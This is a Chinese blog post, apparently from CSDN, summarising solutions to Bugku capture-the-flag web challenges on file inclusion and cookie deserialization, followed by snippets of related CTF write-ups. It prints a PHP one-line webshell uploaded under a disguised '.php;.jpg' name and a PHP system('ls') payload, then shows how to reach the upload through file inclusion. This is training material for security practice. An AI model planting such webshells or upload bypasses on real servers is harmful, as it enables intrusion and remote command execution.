bugku web 系列题目思路总结(七)

最新推荐文章于 2024-07-30 20:29:32 发布
最新推荐文章于 2024-07-30 20:29:32 发布
阅读量907 收藏 1
点赞数
分类专栏: ctf 日报
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yukinorong/article/details/99540968
版权
本文总结了Bugku平台的三个Web安全挑战,包括文件包含漏洞利用,通过GET参数获取源码并解密FLAG,以及SQL注入题目中的.DS_Store源码泄露。涉及知识点有上传木马、URL转码、.DS_Store文件利用和信息收集技巧。
摘要由CSDN通过智能技术生成

bugku 文件包含2

查看源码,有upload.php,结合题目应该是关键信息。进入
上传文件。
参考博客: https://blog.csdn.net/qq_33417843/article/details/79756682
第一种方法:上传一句话木马,<?=eval($_POST['shell']);> 上传文件1.php;.jpg。
链接菜刀失败。
第二种方法,构造语句<script language=php>system("ls")</script>
由于恰好flag文件在根目录,在访问这个文件即可得到密码。
访问文件方法:

  1. 直接域名访问。 http://123.206.31.85:49166/upload/201908100534091751.jpg
  2. 包含文件访问 http://123.206.31.85:49166/index.php?file=upload/201908100534091751.jpg

题过了,菜刀还是不会用。

bugku flag.php

点了Login没反应,一开始以为是要在post里添加 summit=Login才能用,发现不对。
提示hint。直接用get方法提交hint参数(任意)。得到代码源代码。
源码要求:
hint作为参数需要存在 且 cookie 包含 ISecer 其值反序列化后的值为 $key。
这里重点是,结尾给出了key值,然后在程序运行时,判

最低0.47元/天 解锁文章
图南yukino
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku web 系列题目思路总结(四)
yukinorong的博客
08-08 345
bugku welcome to bugkuctf 查看页面,分析源码。user不为空且要以文件方式读入字符串"welcome to the bugkuctf" 利用上次学习的php伪协议, 这里引用两个博客: https://www.cnblogs.com/Pinging/p/8278168.html https://blog.csdn.net/wy_97/article/details/774...
bugku-各种绕过(web7)
烟敛寒林的博客
12-08 1519
题目地址:http://123.206.87.240:8002/web7/ 通过阅读代码,我们发现要想得到flag就要达到下面三个条件: 使 uname的sha1值 与 passwd的sha1的值 相等 但是同时 uname 和 passwd两个的值又不能相等 id == “margin” 解决方法: get方式提交 uname 和 id,post方式提交 passwd 把 una...
[Bugku] web-CTF靶场系列详解①!!!
最新发布
muyuchen110的博客
07-30 1105
平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。
BUGKU--web详解
qq_49422880的博客
05-28 1998
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
Bugku web7 你必须让他停下
weixin_44522540的博客
02-22 414
六、web7 你必须让他停下 启动场景,页面一直刷新,图片也显示不出来,看了人家的wp, 打开burp,抓包,发送到repeter,go3次左右flag就会出来
Bugku web(1—35)
weixin_30376163的博客
11-15 538
1.web2 打开网页: 哈哈,其实按下F12你就会发现flag。 2.计算器 打开网页,只是让你输入计算结果,但是发现只能输入一个数字,这时按下F12,修改一下参数,使之可以输入多个数字,修改后输入结果就拿到flag了。 3.web基础$_GET 30 打开网页,审计一下大概是要让其得到一个what=flag,于是在URL后面加上?what=fl...
bugku web 系列题目思路总结(一)
yukinorong的博客
07-31 2311
bugku web 系列题目,仅作为自身答题积累,包含题目关键步骤,并没有包含答案,只包含前三分之一。 希望自己能坚持刷下去。加油。 bugku post 可利用脚本为链接传输post数据 import requests s = requests.Session() r = s.get("http://123.206.87.240:8002/post/") values = {'what':'f...
bugku web 系列题目思路总结(五)
yukinorong的博客
08-09 481
bugku insert into 注入 PHP explode() 将字符串打散为数组。根据第一个参数分割。 一个基于时间的盲注代码。 # -*- coding:utf-8 -*- import requests import sys # 基于时间的盲注,过滤了逗号 , sql = "127.0.0.1'+(select case when substr((select flag from fl...
Bugkuweb系列题记录
qq_51558360的博客
04-20 900
web1 打开场景,按F12查看源代码 web2 打开是一个计算器,但是只能输入一个数字。打开源码修改长度 输入结果就得flag web3 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; web4 法一:hackbar传参 法二:构造表单 <form action="/post/" method="post"> <input type="text" name="what"> &l
BugKu ctf web前7题writeup
qq_39585393的博客
10-12 505
前几题都是入门题。。 web2 听说聪明的人都能找到答案。。一堆滑稽不停,直接f12进去看源码,找到flag KEY{Web-2-bugKssNNikls9100} 计算器题 发现只能输入一位数,按F12, 用选区器选取文本框,在maxlength那个把1改大,然后就能正常输入了 web基础get 直接在URL后面传参 what=flag web基础post POST请求没办法写在url里,需要用hackbar或者burp修改,格式就是在最下面Content里写 参数1=值&参数2=值 如果用ha
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
BUGKU-WEB
wojiushilsy的博客
02-22 515
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
Bugku-web
qq_45987641的博客
12-25 167
bugku-web wp 13.打开网页也不知道是什么gui蹲西 点击测试网页,发现url 为:“http://your test ip/index.php?file=show.php”中参数有file选项,让我们联想到了文件包含漏洞。构造url=“http://your test ip/index.php?file=php://filter/read=convert.base64-encode/resource=index.php” , 网页返回base64 php://filter/read/conv
bugku web
沐目的博客
05-06 976
bugku web8 可算是自己写出来一道代码审计的题,虽然比较简单。 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "&...
BugKuWeb
paintShadow的博客
08-21 422
一、秋名山老司机 打开链接要求两秒之内计算出结果 明显跑脚本,代码如下: import requests import re url='http://123.206.87.240:8002/qiumingshan/' r = requests.session() requestpage = r.get(url) ans = re.findall('<div>(.*?)=?;</...
BugkuWEB
qq_45946385的博客
07-29 194
这里写目录标题1.web22.计算器3.web基础$_GET4.web基础$_POST5.矛盾6.web37.域名解析8.你必须让他停下9.本地包含10.变量111.web5 1.web2 源代码 KEY{Web-2-bugKssNNikls9100} 2.计算器 字数限制了改一下我改成10了 flag{CTF-bugku-0032} 3.web基础$_GET 直接改?what=flag fl...
bugku - Web
UP's blog
09-03 2281
刚刚入门CTF,如有错误,望大佬指教
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值